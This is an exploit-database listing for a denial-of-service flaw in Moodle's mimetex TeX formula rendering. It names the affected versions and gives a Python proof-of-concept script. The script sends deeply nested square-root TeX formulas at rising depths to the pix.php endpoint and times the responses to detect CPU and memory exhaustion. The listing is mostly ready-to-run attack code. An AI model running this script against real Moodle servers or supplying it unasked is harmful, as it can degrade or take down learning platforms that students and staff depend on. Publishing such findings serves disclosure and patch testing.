Share
## https://sploitus.com/exploit?id=PACKETSTORM:216184
=============================================================================================================================================
| # Title : Moodle TeX Formula Rendering via mimetex Resource Exhaustion Denial of Service |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://moodle.org |
=============================================================================================================================================
[+] Summary : A denial-of-service (DoS) vulnerability was identified in the TeX formula rendering component of Moodle.
The issue occurs when rendering TeX content using the mimetex engine without enforcing sufficient execution time or resource limitations.
By submitting specially crafted TeX formulas designed to trigger excessive parsing complexity or deep recursive processing, an authenticated user may cause disproportionate CPU and memory consumption on the server.
[+] Successful exploitation could lead to:
Significant performance degradation
Increased response latency
Internal server errors
Temporary service interruption
The vulnerability stems from insufficient resource control during TeX processing, allowing computational exhaustion through maliciously structured formula input.
[+] affected : from 0 before 4.5.9
from 5.0.0 before 5.0.5
[+] POC :
import requests
import time
TARGET_URL = "http://your-moodle-site.com/filter/tex/pix.php"
TEST_LEVELS = [100, 300, 600, 1000]
HEADERS = {
"User-Agent": "Mozilla/5.0 (Security Testing)"
}
def measure_baseline():
print("[*] Measuring baseline response time...")
try:
start = time.time()
r = requests.get(TARGET_URL, headers=HEADERS, timeout=10)
duration = time.time() - start
print(f"[+] Baseline response time: {duration:.2f}s (HTTP {r.status_code})")
return duration
except Exception as e:
print(f"[-] Baseline error: {e}")
return None
def test_payload(depth, baseline):
deep_nesting = "\\sqrt{" * depth + "1" + "}" * depth
data = {'tex': deep_nesting}
print(f"[*] Testing depth: {depth}")
try:
start = time.time()
response = requests.post(TARGET_URL, data=data, headers=HEADERS, timeout=30)
duration = time.time() - start
print(f"[+] Response time: {duration:.2f}s (HTTP {response.status_code})")
if response.status_code >= 500:
print("[!] Possible crash or internal error detected.")
if baseline and duration > (baseline * 5):
print("[!] Significant delay compared to baseline. Potential vulnerability.")
except requests.exceptions.Timeout:
print("[!] Timeout detected โ possible resource exhaustion.")
except Exception as e:
print(f"[-] Error: {e}")
def check_vulnerability():
print(f"[*] Testing target: {TARGET_URL}")
baseline = measure_baseline()
if baseline is None:
print("[-] Cannot establish baseline. Aborting test.")
return
for level in TEST_LEVELS:
test_payload(level, baseline)
if __name__ == "__main__":
check_vulnerability()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================